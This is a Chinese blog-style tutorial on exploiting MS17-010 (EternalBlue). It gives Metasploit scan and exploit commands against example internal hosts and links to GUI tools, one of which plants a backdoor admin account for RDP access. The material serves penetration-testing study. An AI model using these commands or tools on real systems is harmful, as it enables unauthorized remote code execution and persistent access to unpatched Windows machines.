本公众号提供的资料和信息仅供学习交流，不得用于非法用途；

对于因使用本公众号内容而产生的任何直接或间接损失，本公众号不承担任何责任；

本公众号尊重他人的知识产权，如有侵犯您的合法权益，请及时联系我们，我们将尽快处理。

一、永恒之蓝介绍

• SMB是一个协议服务器信息块，它是一种C/S、请求/响应协议。通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源，电脑上的网上邻居就是靠SMB实现的。SMB协议工作在应用层和会话层，可以用在TCP/IP协议之上，SMB使用TCP139端口和TCP445端口
• Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞，恶意代码会扫描开放445文件共享端口的Windows机器，无需用户任何操作，只要开机上网，不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

二、MSF利用永恒之蓝

• 针对ms17-010进行扫描

use auxiliary/scanner/smb/smb_ms17_010set threads 15set rhosts 10.10.1.0/24run

• 在MSF中一些常用的利用模块

//执行成功后会获取⼀个Meterpreter会话（高版本的操作系统容易造成蓝屏）exploit/windows/smb/ms17_010_eternalblue//主要功能是执行命令，执行成功会返回命令结果auxiliary/admin/smb/ms17_010_command

• 一般对于高版本操作系统的机器尽量使用ms17_010_command模块，会较为稳定

use auxiliary/admin/smb/ms17_010_commandset command whoamiset rhosts 10.10.1.228set threads 12run

• 如果直接利用ms17_010_eternalblue这个模块有可能导致目标蓝屏的，若目标操作系统是Windows 7、WinServer 2008这种蓝屏的机率就没有这么大，可以使用ms17_010_eternalblue模块。

三、其它工具利用

EquationToolsGUI

• 下载地址：https://github.com/abc123info/EquationToolsGUI

• 其功能是添加账号密码admin01: Config123!@#
• 解压密码：123456

• 执行成功以后会创建一个新的账户admin01: Config123!@#，此时可以使用RDP远程连接

eBSploit永恒之蓝windows快速利用工具

• 下载地址：https://github.com/Anyyy111/eBSploit
• 工具开发者在b站的演示视频：https://www.bilibili.com/video/BV1PTpfeXEgc/?spm_id_from=333.999.0.0

原文始发于微信公众号（SecurePulse）：内网渗透 MS17-010